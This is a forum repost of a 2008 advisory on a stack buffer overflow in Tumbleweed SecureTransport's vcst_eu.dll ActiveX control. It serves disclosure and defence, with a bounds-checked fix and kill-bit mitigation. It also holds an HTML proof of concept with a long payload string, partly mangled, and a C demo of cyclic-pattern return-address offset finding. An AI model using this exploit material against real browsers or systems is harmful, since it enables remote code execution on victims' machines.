Server Security Forum: discussion of application configuration and security management for FTP, mail, web, file, DNS and other servers.
Section: Software vulnerability releases

Title: Tumbleweed SecureTransport vcst_eu.dll ActiveX control remote stack overflow vulnerability
Author: flyfox

Affected systems: Tumbleweed SecureTransport 4.6.1
Description: BugTraq ID 28666

Tumbleweed SecureTransport is a secure file-transfer product that lets users move sensitive files over the Internet.

The SecureTransport FileTransfer ActiveX control (vcst_eu.dll, CLSID 38681fbd-d4cc-4a59-a527-b3136db711d3) contains a stack-based buffer overflow. A remote attacker who gets a user to open a web page that instantiates the control can run arbitrary code with that user's privileges.

Related code (IDL of the control's interface):

interface IActiveXTransfer : IDispatch {
    [id(0x00000007), helpstring("method TransferFile")]
    HRESULT TransferFile(
                    [in] VARIANT url,
                    [in] VARIANT hostname,
                    [in] VARIANT localfile,
                    [in] VARIANT remotefile,
                    [in] VARIANT fdxcookie,
                    [in] long issecure,
                    [in] long isupload,
                    [in] int portno,
                    [in] long isascii,
                    [in] long shouldperformmd5,
                    [in] long ischeckpointrestart,
                    [in] int serverping,
                    [out, retval] VARIANT* errbuffer);
};

Passing a very long value as the remotefile parameter of IActiveXTransfer.TransferFile() triggers a stack overflow and can lead to arbitrary code execution, which is consistent with the string being copied into a fixed-size stack buffer without a length check. Other string parameters of the same method, such as localfile and fdxcookie, may be affected in the same way.

Source: Patrick Webster (pwebster@ausgeo.com.au)

Link: http://marc.info/?l=bugtraq&m=120759744518809&w=2

Test method:

Warning: the following program may be harmful. It is provided for security research and teaching only; use it at your own risk.

<html>
<!-- PoC: instantiate the vulnerable control and call TransferFile with an over-long
     remotefile argument. Argument order follows the IDL above: url, hostname, localfile,
     remotefile, fdxcookie, issecure, isupload, portno, isascii, shouldperformmd5,
     ischeckpointrestart, serverping. The payload is the original author's string as it
     survives on this page: the forum word filter replaced part of it with "***" and the
     non-alphanumeric bytes before the trailing alphanumeric block were mangled by
     re-encoding, so it will not reproduce the author's control flow as-is. The pieces are
     concatenated only so the string literal is syntactically valid across lines. -->
<object classid="clsid:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="vulnerable"></object>
<script language="javascript">
var payload =
"hqwtozjihhkozrlayruxkiejkcqkiyrtepnecvuqpnlzkjtgbugiqylucncejkrsixpxchpkjfjigjrqgvniwwhjssgitappmkzlbpwgmyhshxuwmcluhgrpwxfdowccrytdtrwyvdmfdatdazeizbqe" +
"xocgiffzekzvlenkrncoqpqvtcldmpzpijztguushwyizouwenzrjfildoepkoyeptrzidlyugbcrhxrmurrpdxyyjlzbegrkquoliwdhfdtejosglngqovvzdjzlcgoybvsaukcmqcugvmvqwmqvfudl" +
"fmpvrmulkpqdvguvfxuhfbuaztlsgbyhujijkfpdzgdykcgvmvfqrtrrzxigraumeausvnfdqkfyqnotnswftdyrhkdbfyzhakqddrxieofyrnljlpttgtynlkowfpdgsqstnopgagkwcujlqtocvbyju" +
"tvbujujbsloqlclpxtklqpeosthirazgjzelmuxpulejcqdclsebnalogupzslgafpsjjejuuikawjzwaamlnvzwqmqeuytofmbuneclybwzckujhmzhuaeaytkaqplxgicubjvxopiergiyjveegvbsp" +
"obcfgjxbcgeyzywfukxzvvzwejvhqdrksweztwbrhmctqqfmurhxutifcqzusvbilkcjnpunbnsqhvxdmxmqdphytcidbswjuxmhkhrbyisvvgvburwysfdxibpsdihjjpbynqpwdbqbwtrikbgybejtr" +
"qlbscwnsdhuxsajpbkeamebyjgabesztonphfxkfclpkgffrdhbdqkpsxapushvxwumgcvrfgnudmoagoathkopzfdlavtnaxphwlakccuqaydaaxaldreclzwgcxkocglvssrjhawmtpeanplukyhtiz" +
"mwnyribnfjjatcxhsjsjaaipbmtsmavcioiidvuvzewpvjdfhqkguammyqgucftxpyhkjcsyhbhoddrpvqwugerpbmmqlsllqnpquoytlbtvwbryzajddsxtzqalattygibqzpeamqzkidpejhpwszyak" +
"yagkqjxcjgcrwqkbygmcsddyudhifpbydpgasxspdjatsarcjqosrcvrwhdkkukjsaojtbtaijreogjdwfdafpjrstaceuqcvwiyvafeicsbsvlcavythksnyraoiuucswpspcvhbweytwobkfqwvujoc" +
"zqdzefoqzvosazdpvjxhyqdndpptsrapmmaufxsixokucvkzzkobsnapezsbcwmgbnnruvffkjszeskzkgykwhkqxiivjwcecqmxztgtgrafpcryqkzyjrpqohiswhfdtosyzhjapoyblqprmdynrhnmf" +
"ezwwawpcumkfenzpbbljwcqloarggkvsudoolnffjwawzzvsugkfaddknmipuwwxtlzgkmkcjrdzkohkhrbmzzvhfglhaglmbwnvpixpcbeftvfnjimvtygxypghchbzlsgpwsyzlqcipzombvsjgzgks" +
"rmkjajldrihbbmelmudmfsqhwwpxfeewwjzobyfxzvgomrrwqswadbtwegtddyfnaipqqqrzxmvubjabuxndndqpkndbwkpihgaquogcufpekjrbmecxbzsskentbwshkndbpbkizevnqektfgikckddb" +
"msnxflbkgytyeikzdljxbpuwuhrmraqelzgrsychlmhesdbctsvoimbxejryolpibdvzogaxfuhjydvcnwhvsfixmujulnwoeejvpsvupocctcltelmglshxiwouxewzurfnjdmnaxjpaapaktbtqkqyj" +
"qbglseztzuqtbqxczkpncekgbbvjixjgnabhgbowiavkxrgcjxtkzlruclxmjtspfeiwyouvaugnxbqfjfbkwofltqjyldfkxbshfcfwummwsgiomitzgofvneugonkfnnzjkljvxwakxontceinnwkid" +
"govzmjfn***vwutoymkvsugaqhzdlsoegtkuphopynbsdrvqpjcnksgijmzwysmzworiwsbtbwasfoqlbjzmwqrgxddbeeksuwsncgcwjyonlcpokxwcrbdftncqfwlyfqppwmlrlmpuziomcoxumosjb" +
"vzqbklmgijqcpabeptgfchsrdwijxbyxflkimxotdrjfkriytivzfafwuxfhrevxoauvzedpqitemwcitssmkbwetfmxkivpdxklfxrjhdamdurezcjnkatqmnwcbaaewpdnewaptgarudpdpnkemrfzi" +
"eflvqxamdznwfvfturxywnpjwnmdtuzsmfxnmmetwvqecazhziwvgfanhktgkroefyervhzqaavhgljfdizbjnvxkjlffeewmfotrfiyntfivibjznssgmzjvzmyvfgwqdzmddclhdemdkydcluewixbg" +
"ugcomrvhhtqhcjewofypbnavxshnkwqdrwwwkyepexkpinurlbicatqtvqiyoizpuznzcmeuyoaiwetbzeupovdlasxrftjshkxslkglmsqetachvjzwcgeeelobuqcdwayqphfghqgfnypersuivszqb" +
"irpjndoehlxefeqxbompnztajzchqhpkdocmevdoenhozzueuotwxrweatadawjpxzulscryczknwyaphmuevgvzzqgoqzyrspvizzugxqswgradphvcfbmagympgddxpneoozabadldqgicetriamcrw" +
"ssvszwelcasevabxomgubhpfojhalmypkycgybdpfewbngysxfinqboquypijitrothtyspqvmqawnagafjwzgoxkwqpohxfxruwrcmtlhflpakrpdxnigliwqqtrbjkhnbaagkkumqllvudlevjbkehq" +
"gffyylybfeymvdnmardcucyrpasngesjkoywczjffbjmhewtgeygpdkrhbuomaugznnkcxhoaoqhxdhqadfqeffpdbrvgieodttdixeddsoxcmmrdmjdxnbzfiuvrfnioshyrxtvodbxafxybbwfvwcus" +
"jxgdzzanymehvtpezyuuberjdzkfcrrujqdltkkakwfleqxtcoucjfpoljlwtjvxenczuxrbgzrinyxwuzzchjnryymochnzsrflosffzwtgljxudlerywbukvxemcmwxayixchqgvxdexdmvfowmlzsw" +
"khjtltirfnmgfarnvllqfjionxpdzjaixugozjjvcovznexzqxhxprciiesjjmbimjhfshyoigqknpsaongpgqrsevegzqxqlvqynmewfojizcwtwodsrcwnzqczqnwyextizzukwvkkdasstgbrcwyyf" +
"qqnlbheqvfhgfgwksccqsqixngspevobgjlinftjlqycvbbsuphuqoxxstwqudavkqfyokuakwgejycuhyhrpovbnttvhvrgnwzlpavdsthykmjhmawlblfssplhrsbjtvhwamjviartmgjzatbparfcn" +
"halorgubyovlncfyqarosoilfrxkhupmhusrioqgdzzyzhsczhnoonhwnusugfeqyslilkswnvhsuolygjhifmhwqmcaimqaqffkhabuexzkykysqyotyrffqiliknvlxrialuqsbamsphbypaadfqgxj" +
"xtfkzlxcuucovaozbjtrqjyrqejtlolwxsjuzayhzyomkfzybfkyzgodrrixemrzzrwdxyfclvxmmdlovwsctjtsetodtoqlvjrukhuqktaqzvodjrtrgmeufydvpicmynnhzavroxuffivusziyejvaw" +
"ogclpdkultpmcwzeowpyqedujhiyzhtjmebngyjypnfeialaqfziytmisaumxpkzjedipwndmksjilgditudqqcohrsqdgubibxthcjrzpiquthmmhiajsvncbzvnuddijfxvysskuolkfdebbvvqymro" +
"fggurkuawbiczranfeszzpylujksaefjoxpvmthxtdmgqwczscnuhcnfrnozfxwuodgmhghbijsrytzjnjiwdynnlymqbrjsspvdgodegznbkekhyoboqmlzquvehrsreaukduqgvoyrvgcvrhmzxqjhs" +
"oqrkrmigfnhqvmnclhcauyypvcznescgfqspefodxhzukalkfrrmpnptbhytzxveginvienxfejivyrjaesjowdekxauxvuhqgusjyvxoxfxjzntxehtukeqaosgttbatswuhssxgmytlaxauymlpcnow" +
"qvhwgijhfduwtwalnuzoigzilkhbnhzmglwjfgmdlbnjknjajufwhqdddbnzsxxifzgadlsniuqbjvqbnmceducigdgnpnqxrgfdrpfmefbsuhvwpynfguotgjoauvcsfsxkxqbuovatbvwzalfiibodr" +
"zfvgzkejrwlbvdodjvruegeepepxqzhopuaazvhgnacewmxozkmymxknjfoxekgijrwxrjtebbqwppsruvlsihhpqbvipxhcalqlumwzvofnqnhkzynafwcjqfslzjjbiebzrymvtvsdqsoyhhzouxgue" +
"rmdofufoqzngpykpjhmpqelnouzqwzh?" +
"!倌*" +
"utx菽賞鬩 uyiiiiiiiiiicccccc7qzjaxp0a0akaaq2ab2bb0bbabxp8abujikljhqtepc0c0lkg5gllkcldechc1jolkpob8lkqoq0eqjkqylkgdlkeqjnp1ipminlk4ipd4dgiqhjdmeqhbjkjtgkpt" +
"gtc4cekulkqoq4c1jkbflkdlpklkqoeleqjklkellkc1jkk9qlfdethcqop1l6e0f6e4lkqvfplkg0dllkbpelnmlkcxc8lijxk3ipczf0e8cnn8jbcce8lxknmzdnpwkojgbccqblbcepaa";
vulnerable.TransferFile("a", "b", "c", payload, "d", false, false, 80, false, true, true, 420);
</script>
</html>
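The description says an over-long remotefile value smashes the stack, and the PoC above feeds the control a long non-repeating string. The added example below (editor's code, not from the advisory and not Tumbleweed's) models that in C: a TransferFile-style handler that copies the argument into a fixed stack buffer, the bounds-checked version beside it, and a cyclic pattern that turns the bytes landing in the saved return address into an offset, which is how the length of a real overflow string is chosen. The frame layout (a 260-byte buffer directly under a 4-byte saved return address, as on 32-bit Windows) is an assumption; the page gives no layout for vcst_eu.dll. The pattern generator is the same construction as Metasploit's pattern_create, reimplemented here.

```c
/* Added example, not the advisory's or Tumbleweed's code. Models a TransferFile-style
 * handler copying a caller-controlled string into a fixed stack buffer. ASSUMED layout:
 * a 260-byte buffer (MAX_PATH-sized) directly below a 4-byte saved return address. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE   260                      /* assumed fixed-size remotefile buffer */
#define RET_SIZE   4                        /* 32-bit saved return address */
#define FRAME_SIZE (BUF_SIZE + RET_SIZE)

/* Simulated stack frame: buffer followed by the saved-return-address slot. One array,
 * so an over-long copy stays inside a single object and the demo is deterministic
 * instead of corrupting the real stack. */
struct frame { unsigned char mem[FRAME_SIZE]; };

#define RET_SLOT(f) ((f)->mem + BUF_SIZE)

/* Placeholder "original" return address so we can tell when it has been overwritten. */
static const unsigned char ORIGINAL_RET[RET_SIZE] = { 0xef, 0xbe, 0xad, 0xde };

void frame_init(struct frame *f)
{
    memset(f->mem, 0, BUF_SIZE);
    memcpy(RET_SLOT(f), ORIGINAL_RET, RET_SIZE);
}

/* Vulnerable pattern: strcpy-style copy with no check against BUF_SIZE. The cap at
 * FRAME_SIZE exists only so the model cannot write past its own array; a real strcpy
 * keeps going. Returns the number of bytes written. */
size_t vulnerable_copy(struct frame *f, const char *remotefile)
{
    size_t n = strlen(remotefile);
    if (n > FRAME_SIZE)
        n = FRAME_SIZE;
    memcpy(f->mem, remotefile, n);
    return n;
}

/* Hardened form: length plus terminator must fit, otherwise the call is refused
 * before anything is copied. Returns 0 on success, -1 on reject. */
int hardened_copy(struct frame *f, const char *remotefile)
{
    size_t n = strlen(remotefile);
    if (n >= BUF_SIZE)
        return -1;
    memcpy(f->mem, remotefile, n + 1);
    return 0;
}

/* 1 if the saved return address no longer matches ORIGINAL_RET. */
int ret_clobbered(const struct frame *f)
{
    return memcmp(RET_SLOT(f), ORIGINAL_RET, RET_SIZE) != 0;
}

/* Cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is unique within the first
 * 20280 bytes, so whatever lands in the return slot identifies its offset. */
char *pattern_create(size_t len)
{
    char *p = malloc(len + 1);
    for (size_t i = 0; i < len; i++) {
        size_t t = i / 3;                   /* index of the 3-char group */
        switch (i % 3) {
        case 0:  p[i] = (char)('A' + (t / 260) % 26); break;
        case 1:  p[i] = (char)('a' + (t / 10) % 26);  break;
        default: p[i] = (char)('0' + t % 10);         break;
        }
    }
    p[len] = '\0';
    return p;
}

/* Offset of a RET_SIZE-byte window inside the pattern, or -1 if absent. */
long pattern_offset(const char *pattern, const unsigned char *window)
{
    size_t plen = strlen(pattern);
    for (size_t i = 0; i + RET_SIZE <= plen; i++)
        if (memcmp(pattern + i, window, RET_SIZE) == 0)
            return (long)i;
    return -1;
}

/* Run a payload_len-byte pattern through the vulnerable copy; return the input offset
 * that overwrote the saved return address, or -1 if it was not reached. */
long find_ret_offset(size_t payload_len)
{
    struct frame f;
    frame_init(&f);
    char *pat = pattern_create(payload_len);
    vulnerable_copy(&f, pat);
    long off = ret_clobbered(&f) ? pattern_offset(pat, RET_SLOT(&f)) : -1;
    free(pat);
    return off;
}

/* 1 if the hardened copy refuses a payload_len-byte pattern and the return slot is intact. */
int hardened_rejects(size_t payload_len)
{
    struct frame f;
    frame_init(&f);
    char *pat = pattern_create(payload_len);
    int rejected = (hardened_copy(&f, pat) == -1);
    int intact = !ret_clobbered(&f);
    free(pat);
    return rejected && intact;
}

int main(void)
{
    printf("vulnerable: 1000-byte remotefile reaches saved return address at offset %ld\n",
           find_ret_offset(1000));
    printf("hardened: 1000-byte remotefile rejected = %d\n", hardened_rejects(1000));
    return 0;
}
```

Compile with `gcc -std=c99 -Wall`. Here find_ret_offset(1000) returns 260: byte 260 of the input is the first to land in the return-address slot, and a string shorter than that (e.g. 200 bytes) leaves it untouched. Against the real control the same measurement is made with a debugger attached to the browser while the PoC runs; the fix is the length check in hardened_copy, applied to every VARIANT string TransferFile accepts, not only remotefile.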

Recommendation: vendor patch

Tumbleweed
----------
At the time of writing the vendor has not released a patch or upgrade. Users of this software should watch the vendor's home page for a new version:

http://www.tumbleweed.com/products/securetransport/index.html

Until a fixed build is available, the control can be kept from loading in Internet Explorer by setting its kill bit: create the DWORD value "Compatibility Flags" with data 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{38681fbd-d4cc-4a59-a527-b3136db711d3}. This stops web pages from instantiating the vulnerable control without uninstalling the product.
Posted: 2008-4-12 9:51:15